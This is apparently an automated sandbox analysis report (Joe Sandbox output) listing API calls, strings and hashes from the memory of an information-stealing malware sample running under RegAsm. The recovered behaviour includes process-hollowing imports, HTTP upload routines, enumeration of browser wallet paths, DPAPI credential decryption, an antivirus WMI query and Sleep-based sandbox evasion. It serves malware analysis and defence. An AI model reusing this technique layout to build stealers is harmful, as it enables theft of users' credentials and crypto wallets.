                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B152
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B169
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B180
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B197
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B1AE
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B1C5
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B1DC
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B1F3
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B20A
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B221
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B238
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B24F
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B266
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B27D
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B294
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B2AB
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B2C2
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B2D9
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B2F0
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B307
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B31E
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B335
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B34C
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B363
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B37A
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B391
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B3A8
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B3BF
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B3D6
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B3ED
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B404
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B41B
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B432
                                                    • GetProcAddress.KERNEL32(CreateProcessA), ref: 0041B448
                                                    • GetProcAddress.KERNEL32(GetThreadContext), ref: 0041B45E
                                                    • GetProcAddress.KERNEL32(ReadProcessMemory), ref: 0041B474
                                                    • GetProcAddress.KERNEL32(VirtualAllocEx), ref: 0041B48A
                                                    • GetProcAddress.KERNEL32(ResumeThread), ref: 0041B4A0
                                                    • GetProcAddress.KERNEL32(WriteProcessMemory), ref: 0041B4B6
                                                    • GetProcAddress.KERNEL32(SetThreadContext), ref: 0041B4CC
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B4DD
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B4EE
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B4FF
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B510
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B521
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B532
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B543
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B554
                                                    • LoadLibraryA.KERNEL32(dbghelp.dll,?,0041922C), ref: 0041B564
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B584
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B59B
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B5B2
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B5C9
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B5E0
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B604
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B61B
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B632
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B649
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B660
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B677
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B68E
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B6A5
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B6C5
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B6DC
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B6F3
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B70A
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B721
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B745
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B75C
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B773
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B78A
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B7A1
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B7B8
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B7DC
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B7F3
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B80A
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B821
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B838
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B84F
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B866
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B87D
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B894
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B8B4
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B8CB
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B8E2
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B8F9
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B910
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B930
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B947
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B967
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B97E
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B9A2
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B9B9
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B9D0
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B9E7
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B9FE
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BA15
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BA2C
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BA43
                                                    • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 0041BA59
                                                    • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041BA6F
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BA8F
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BAA6
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BABD
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BAD4
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BAF4
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BB14
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BB2B
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BB42
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BB59
                                                    • GetProcAddress.KERNEL32(SymMatchString), ref: 0041BB78
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                    • API String ID: 2238633743-2740034357
                                                    • Opcode ID: a4580aef7196ab40cac15de4e3c6625ffa806c5fa5d16c7cc0568451c0f19aac
                                                    • Instruction ID: 64df46d759b3a8e539eb425d674754a75b55508f076e1d27ec912ac7423ac894
                                                    • Opcode Fuzzy Hash: a4580aef7196ab40cac15de4e3c6625ffa806c5fa5d16c7cc0568451c0f19aac
                                                    • Instruction Fuzzy Hash: 9552C57D481214EFEB025F61FE19AA43FB3F70B3417197129E91289671E77648A8EF80

                                                    APIs
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404373
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404387
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 0040439B
                                                      • Part of subcall function 0040430F: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043B9
                                                      • Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043C9
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040595F
                                                    • StrCmpCA.SHLWAPI(?), ref: 00405975
                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AEF
                                                    • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00400100,00000000), ref: 00405B4C
                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00428D7C,00000000), ref: 00405F2B
                                                    • lstrlenA.KERNEL32(00000000), ref: 00405F3C
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00405F4C
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00405F53
                                                    • lstrlenA.KERNEL32(00000000), ref: 00405F68
                                                    • memcpy.MSVCRT ref: 00405F7E
                                                    • lstrlenA.KERNEL32(00000000), ref: 00405F8F
                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405FA8
                                                    • memcpy.MSVCRT ref: 00405FB5
                                                    • lstrlenA.KERNEL32(00000000,?,?), ref: 00405FCF
                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405FE2
                                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405FFE
                                                    • InternetCloseHandle.WININET(00000000), ref: 00406061
                                                    • InternetCloseHandle.WININET(00000000), ref: 0040606D
                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00405B84
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                    • InternetCloseHandle.WININET(00000000), ref: 00406076
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                    • String ID: "$------$build_id$mode
                                                    • API String ID: 487080699-3829489455
                                                    • Opcode ID: 99e7d839f9470243f8a500febddaa2585a4ce8104e375d9646ee5b01df51d87c
                                                    • Instruction ID: c3a436f612394fb5ea9af5c3dff246c6ebafd40c3fbf54516d0a2530dbd512cc
                                                    • Opcode Fuzzy Hash: 99e7d839f9470243f8a500febddaa2585a4ce8104e375d9646ee5b01df51d87c
                                                    • Instruction Fuzzy Hash: 0632EB71920118AADB15FBA1DC96FDEB379BF14305F5001AAF216B21B1DF386B88CE54

                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • FindFirstFileA.KERNEL32(00000000,?,00425200,00425200,00000000,?,?,?,00428F3C,00425200), ref: 0040A045
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 0040A0A0
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 0040A0B6
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040AB2C
                                                    • FindClose.KERNEL32(000000FF), ref: 0040AB3D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                    • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                    • API String ID: 3334442632-1189830961
                                                    • Opcode ID: b6171a64cfc6ab4f13282320838a7735dbd279b900ab7de6f694e87253319736
                                                    • Instruction ID: 263e58a2a74b46f478eabfba2e73a67f6604dac1ca14d90e5786d28d1d592fab
                                                    • Opcode Fuzzy Hash: b6171a64cfc6ab4f13282320838a7735dbd279b900ab7de6f694e87253319736
                                                    • Instruction Fuzzy Hash: 225241719002089BDF24FBB1DC56EED737DAF15304F40416AF61AA21A1EE399B88CF59
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 1FA34EE1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                    • API String ID: 823142352-3829269058
                                                    • Opcode ID: 76a1c85f89ad633929d7a557d3b25c77216541363ec811c58dfad368e400959b
                                                    • Instruction ID: c4308a2caa8b1ba3aa82c01ce2af689c6af017e77cc8bc3ac5f3919b57d2ddb8
                                                    • Opcode Fuzzy Hash: 76a1c85f89ad633929d7a557d3b25c77216541363ec811c58dfad368e400959b
                                                    • Instruction Fuzzy Hash: 0CF1D271E083128FDB148F29C98479B77E5AF84726F000969FA86C6381E73EE454DB92
                                                    APIs
                                                    • CoInitializeEx.OLE32(00000000,00000000,?,?,?,Windows: ,00000000,?,00428FE4,00000000,?,Work Dir: In memory,00000000,?,00428E48,00000000), ref: 004129E9
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,Windows: ,00000000,?,00428FE4), ref: 00412A01
                                                    • CoCreateInstance.OLE32(0042AE78,00000000,00000001,0042ADA8,00000000,?,?,?,Windows: ,00000000,?,00428FE4,00000000,?), ref: 00412A1D
                                                    • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,Windows: ,00000000,?,00428FE4,00000000), ref: 00412A65
                                                    • VariantInit.OLEAUT32(?), ref: 00412AC6
                                                    • VariantClear.OLEAUT32(?), ref: 00412AFC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InitializeVariant$BlanketClearCreateInitInstanceProxySecurity
                                                    • String ID: Select * From AntiVirusProduct$Unknown$WQL$displayName$root\SecurityCenter2
                                                    • API String ID: 3243281124-2561087649
                                                    • Opcode ID: 01e7d32d45ff0252796b17b99a1afcd933ba27ea36f00a65b271f1c55a8e973d
                                                    • Instruction ID: cc2f9b12050fb50489b4dacd928ba9f1606622a753a49b6d6fc2a760caa5f7a5
                                                    • Opcode Fuzzy Hash: 01e7d32d45ff0252796b17b99a1afcd933ba27ea36f00a65b271f1c55a8e973d
                                                    • Instruction Fuzzy Hash: 01512971A44208AFEB10CF94DD46FEDBBB8EB08711F604116F611FA1E0C7B8A951CB69
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004138F5
                                                    • Process32First.KERNEL32(00429888,00000128), ref: 00413908
                                                    • Process32Next.KERNEL32(00429888,00000128), ref: 0041391C
                                                    • StrCmpCA.SHLWAPI(?,0042988C), ref: 00413930
                                                    • FindCloseChangeNotification.KERNEL32(00429888), ref: 00413943
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3243318325-0
                                                    • Opcode ID: 2a4b200a08ed556fe0b76f61f99fc73be8100933646605b45de0898bc31b2ca7
                                                    • Instruction ID: c76ae2ebba4cdfdbec52cc22ef4db84e697ee2aab148ee9ae3442f35c02f241c
                                                    • Opcode Fuzzy Hash: 2a4b200a08ed556fe0b76f61f99fc73be8100933646605b45de0898bc31b2ca7
                                                    • Instruction Fuzzy Hash: 2B11C2B5900249EFDF118F91CD09BEFBBBDFB06791F00016AE505A62A0D7B88B40CB65
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412491
                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004124A4
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 004124B8
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • CloseHandle.KERNEL32(00000000), ref: 00412525
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                    • String ID:
                                                    • API String ID: 1066202413-0
                                                    • Opcode ID: 977ae0b600e9dfa5c8bb5876995a90588de119cf502625faec0d1e404a198b9a
                                                    • Instruction ID: 2c0229d212547161a0eb93f3d0d5d82303ca8f07f9ab92fbeb1aaa96aca691bd
                                                    • Opcode Fuzzy Hash: 977ae0b600e9dfa5c8bb5876995a90588de119cf502625faec0d1e404a198b9a
                                                    • Instruction Fuzzy Hash: CC212935900118EBCB11EB60DD56AEDB379AF15309F5041EAA60AB61A0EF349FC8CF94
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00428E48,00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00428E48,00000000,?,00000000,00000000), ref: 00411CCF
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411CD6
                                                    • GetTimeZoneInformation.KERNEL32(?), ref: 00411CE9
                                                    • wsprintfA.USER32 ref: 00411D20
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                    • String ID:
                                                    • API String ID: 362916592-0
                                                    • Opcode ID: 203e413fed742de3b00b513deca226d0cff61aa8e2789412112a4631cc96891a
                                                    • Instruction ID: daf70193e9c0513ecb3072794c83a438d37f7fdfa3376bc861271b49892c1553
                                                    • Opcode Fuzzy Hash: 203e413fed742de3b00b513deca226d0cff61aa8e2789412112a4631cc96891a
                                                    • Instruction Fuzzy Hash: 2BF0BE70A003289FDB20AB24FC0AB9977BBBB02345F1001D5F209AA2E0D7749EC0CF02
                                                    APIs
                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00407E65
                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00407E83
                                                    • LocalFree.KERNEL32(?), ref: 00407EAB
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                                    • String ID:
                                                    • API String ID: 2068576380-0
                                                    • Opcode ID: ec7d2c3964d9433e1bd8db3b7e97589d228e91b9e021ed9bd7c00834a8d4e7c8
                                                    • Instruction ID: c73416beba9d1fde4238afde8a7e84a4d4aa4311c1f55aef6ad3ec00fa4115b4
                                                    • Opcode Fuzzy Hash: ec7d2c3964d9433e1bd8db3b7e97589d228e91b9e021ed9bd7c00834a8d4e7c8
                                                    • Instruction Fuzzy Hash: 72019279900209EFCB01DF98D945A9E7BF5FB09300F0000A5F901AB2A0D774AE50DF61
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041A955), ref: 00411BF8
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,0041A955), ref: 00411BFF
                                                    • GetUserNameA.ADVAPI32(?,00000104), ref: 00411C16
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocNameProcessUser
                                                    • String ID:
                                                    • API String ID: 1206570057-0
                                                    • Opcode ID: cdb89f3b8d2170a32c4f5d9c7d109af83218dd3f9df08350fd3753d412c9dc7b
                                                    • Instruction ID: 6ad48150bf72aad5a6046b0908b1c33b434ec51fc494a64bf18a9d81697ab1ea
                                                    • Opcode Fuzzy Hash: cdb89f3b8d2170a32c4f5d9c7d109af83218dd3f9df08350fd3753d412c9dc7b
                                                    • Instruction Fuzzy Hash: B3E04CB4A00608FFDB10DBD4DC49FADBBB8FB04749F904065F601E2160D7B45A459B64
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Similarity
                                                    • API ID: InfoSystemwsprintf
                                                    • String ID:
                                                    • API String ID: 2452939696-0
                                                    • Opcode ID: 2f2772df9e2289074dc65a3b003ee837af4eb9d8d63b789a1da4cf5f031d46f7
                                                    • Instruction ID: 9caa33327a18f9dae679d202d2ba32c4f74d5e180e33a6cc9dfb65b88a9d38f3
                                                    • Opcode Fuzzy Hash: 2f2772df9e2289074dc65a3b003ee837af4eb9d8d63b789a1da4cf5f031d46f7
                                                    • Instruction Fuzzy Hash: F6D05EB180011CABCB00DBE0FC499D977BCBB09208F4408B1E614E2040E3B8EAD88BA8

                                                    Control-flow Graph

                                                    APIs
                                                    • lstrlenW.KERNEL32(Taxonomic sequence (also known as systematic, phyletic or taxonomic order) is a sequence followed in listing of taxa which aids ea), ref: 0041A776
                                                    • lstrlenW.KERNEL32(The 1999 Rushmoor Council election took place on 6 May 1999 to elect members of Rushmoor Borough Council in Hampshire, England. On), ref: 0041A781
                                                    • lstrlenW.KERNEL32(Oregon Ballot Measure 56 or House Joint Resolution 15 (HJR 15) is a legislatively referred constitutional amendment that enacted l), ref: 0041A78C
                                                    • lstrlenW.KERNEL32(The 1967 October Revolution Parade is the parade on Moscow's Red Square devoted to the 50th anniversary of the Great October Socia), ref: 0041A797
                                                    • lstrlenW.KERNEL32(I-11 was an Imperial Japanese Navy Type A1 submarine that served during World War II. Designed as a submarine aircraft carrier and), ref: 0041A7A2
                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0041A7AD
                                                    • GetProcAddress.KERNEL32(00000000,Sleep), ref: 0041A7C4
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTime), ref: 0041A7D7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • Sleep.KERNEL32(00000014), ref: 0041A7E4
                                                    • Sleep.KERNEL32(00000014), ref: 0041A7EC
                                                    • Sleep.KERNEL32(00000014), ref: 0041A7F4
                                                    • Sleep.KERNEL32(00000014), ref: 0041A7FC
                                                    • Sleep.KERNEL32(00000014), ref: 0041A804
                                                    • Sleep.KERNEL32(00000014), ref: 0041A80C
                                                    • lstrlenW.KERNEL32(Taxonomic sequence (also known as systematic, phyletic or taxonomic order) is a sequence followed in listing of taxa which aids ea), ref: 0041A817
                                                    • lstrlenW.KERNEL32(The 1999 Rushmoor Council election took place on 6 May 1999 to elect members of Rushmoor Borough Council in Hampshire, England. On), ref: 0041A822
                                                    • lstrlenW.KERNEL32(Oregon Ballot Measure 56 or House Joint Resolution 15 (HJR 15) is a legislatively referred constitutional amendment that enacted l), ref: 0041A82D
                                                    • lstrlenW.KERNEL32(The 1967 October Revolution Parade is the parade on Moscow's Red Square devoted to the 50th anniversary of the Great October Socia), ref: 0041A838
                                                    • lstrlenW.KERNEL32(I-11 was an Imperial Japanese Navy Type A1 submarine that served during World War II. Designed as a submarine aircraft carrier and), ref: 0041A843
                                                    • Sleep.KERNEL32(00000014), ref: 0041A84B
                                                    • Sleep.KERNEL32(00000014), ref: 0041A853
                                                    • Sleep.KERNEL32(00000014), ref: 0041A85B
                                                    • Sleep.KERNEL32(00000014), ref: 0041A863
                                                    • Sleep.KERNEL32(00000014), ref: 0041A86B
                                                    • Sleep.KERNEL32(00000014), ref: 0041A873
                                                    • Sleep.KERNEL32(00000014), ref: 0041A880
                                                    • Sleep.KERNEL32(00000014), ref: 0041A888
                                                    • Sleep.KERNEL32(00000014), ref: 0041A890
                                                    • Sleep.KERNEL32(00000014), ref: 0041A898
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8A0
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8A8
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8B5
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8BD
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8C5
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8CD
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8D5
